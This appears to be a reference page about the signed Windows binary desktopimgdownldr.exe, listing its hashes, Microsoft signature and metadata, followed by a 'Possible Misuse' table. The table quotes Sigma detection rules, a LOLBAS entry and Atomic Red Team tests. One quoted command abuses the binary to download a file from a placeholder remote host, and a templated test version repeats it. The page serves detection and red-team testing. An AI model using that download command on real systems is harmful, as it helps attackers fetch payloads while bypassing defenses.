desktopimgdownldr.exe
- File Path:
C:\Windows\system32\desktopimgdownldr.exe - Description: desktopimgdownldr.exe
Hashes
| Type | Hash |
|---|---|
| MD5 | AECDFE9512F9ABF601B5B439FAA2B64A |
| SHA1 | DD4E992C75E791094449FD52F646233C9AD06654 |
| SHA256 | 1F336FA7255266CA76D26928DA7A2E0D4446F4CAE7F2041218BB2B166A97504D |
| SHA384 | 0607C22104D22394E41CCE21C6720AC85C5174926866B62FA4FF73FBD06704628BDF9EF52D71DDE6A44DE5A1C1931C49 |
| SHA512 | 8DB2B94D74817B4B2B59B95CC7FEB9963CDCA372A8144634DFBB9258261B5AD6024B4BF37B48C73C51CEA417585FEFC1F45ED5080F4292AADEB7B6FC5878BCFB |
| SSDEEP | 1536:OarCi80YW9i3P9fS+4mh1yUUt1Thu3SkJXDuMOI14uDLRS4Xe6KXQXQX+:nmYQhIt183SkJTuxuDdSkKAXb |
| IMP | 4497ED51F6847EDEE6F31E6DE69B6378 |
| PESHA1 | 0A683F53F11ED02115F415709AA60D2387EF9B0E |
| PE256 | 3E3017729AE251D02AEE1DE4F0571C297BD06231A74A9CB4EFD45AA6EC62F1EF |
Runtime Data
Loaded Modules:
| Path |
|---|
| C:\Windows\system32\desktopimgdownldr.exe |
| C:\Windows\System32\KERNEL32.DLL |
| C:\Windows\System32\KERNELBASE.dll |
| C:\Windows\SYSTEM32\ntdll.dll |
Signature
- Status: Signature verified.
- Serial:
3300000266BD1580EFA75CD6D3000000000266 - Thumbprint:
A4341B9FD50FB9964283220A36A1EF6F6FAA7840 - Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: desktopimgdownldr.exe
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.19041.1 (WinBuild.160101.0800)
- Product Version: 10.0.19041.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 64-bit
File Scan
- VirusTotal Detections: 0/74
- VirusTotal Link: https://www.virustotal.com/gui/file/1f336fa7255266ca76d26928da7a2e0d4446f4cae7f2041218bb2b166a97504d/detection
Possible Misuse
The following table contains possible examples of desktopimgdownldr.exe being misused. While desktopimgdownldr.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | file_event_win_susp_desktopimgdownldr_file.yml | title: Suspicious Desktopimgdownldr Target File |
DRL 1.0 |
| sigma | file_event_win_susp_desktopimgdownldr_file.yml | description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension |
DRL 1.0 |
| sigma | proc_creation_win_susp_copy_system32.yml | description: Detects a suspicious copy command that copies a system program from System32 to another directory on disk - sometimes used to use LOLBINs like certutil or desktopimgdownldr to a different location with a different name |
DRL 1.0 |
| sigma | proc_creation_win_susp_desktopimgdownldr.yml | title: Suspicious Desktopimgdownldr Command |
DRL 1.0 |
| sigma | proc_creation_win_susp_desktopimgdownldr.yml | description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet |
DRL 1.0 |
| LOLBAS | Desktopimgdownldr.yml | Name: Desktopimgdownldr.exe |
|
| LOLBAS | Desktopimgdownldr.yml | - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr |
|
| LOLBAS | Desktopimgdownldr.yml | - Path: c:\windows\system32\desktopimgdownldr.exe |
|
| LOLBAS | Desktopimgdownldr.yml | - IOC: desktopimgdownldr.exe that creates non-image file |
|
| atomic-red-team | index.md | - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | - Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | ## Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | This test simulates using desktopimgdownldr.exe to download a malicious file | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | set “#{download_path}” && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr | MIT License. © 2018 Red Canary |
MIT License. Copyright (c) 2020-2021 Strontic.